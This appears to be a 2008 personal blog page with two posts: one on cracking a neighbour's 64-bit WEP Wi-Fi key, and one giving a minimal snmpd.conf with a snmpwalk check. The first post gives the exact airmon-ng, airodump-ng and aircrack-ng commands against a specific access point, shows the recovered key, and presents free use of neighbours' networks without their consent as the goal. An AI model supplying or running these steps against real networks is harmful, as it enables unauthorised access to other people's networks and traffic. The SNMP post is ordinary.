Monday, December 8, 2008

Cracking 64Bit Neighbor Wifi Network

64Bit WEP is quite easy to crack, the popular tool is aircrack-ng from this website, I was cracking (always) 64Bit WEP, never try the 128 or more Bit, the reasons, either I wont spend time or many neighbor network available still using 64Bit WEP, :-).. I guess because it easy for them to remember the key.

last action, I only need 9129 IVs, ( the manual on aircrack-ng said, at least 1.5Milions IVs, but that is not entirely needed), here is the result from my last try :

                [00:00:04] Tested 533 keys (got 9129 IVs)

KB depth byte(vote)
0 4/ 11 99(12800) E8(12544) 03(12032) DE(12032) 3D(11776)
1 0/ 1 4B(15616) 0F(13056) 67(12288) BB(12288) 0E(12032)
2 0/ 1 57(15360) 5A(13056) AC(13056) B0(13056) 24(12800)
3 0/ 2 CC(14592) 73(12800) 7D(12288) B2(12288) BA(12288)
4 6/ 35 34(12032) A0(11776) 59(11776) 99(11520) 9C(11520)

KEY FOUND! [ 99:4B:57:38:34 ] (ASCII: .KW84 )
Decrypted correctly: 100%

The manual to use this aircrack-ng is very easy to follow, specially this Tutorial: Simple WEP Crack.

and for me, I use this three command :

./airmon-ng start wlan0 11
./airodump-ng -c 11 --bssid 00:1a:70:82:7b:28 wlan0 -w output1
./aircrack-ng -b 00:1a:70:82:7b:28 output1*.cap

and thats it, you are ready to use your neighbor wifi network.

oh.. almost forgot, one thing, if you guys only have Windows Machine, which is this aircrack-ng tools are for Linux machine, use this small linux distro, called Puppy Linux, put in on USB Drive, and start your machine with USB boot, and you are ready to go.

Sunday, December 7, 2008

Net SNMPD smpd.conf minimum configuration on Linux

I did many quick dirty configuration to monitor my linux machine inside "secure" network using SNMP, the monitoring is always related to traffic size flowing the interface and keeping the machine always in ping-able mode, which means at least no power problem for this machine.

here is the basic snmpd.conf , so I can just use it again without worry misplaced somewhere.


com2sec readonly default mypublic ##or public

view readonly included .
view readonly included .
view readonly included .1 80
view system included
view readonly included system.sysContact
view readonly included system.sysName
view readonly included system.sysLocation
view readonly included interfaces.ifTable.ifEntry.ifAdminStatus


and the snmpwalk command to check whether the configuration is correct or not.

snmpwalk -v2c -c mypublic localhost .


last archive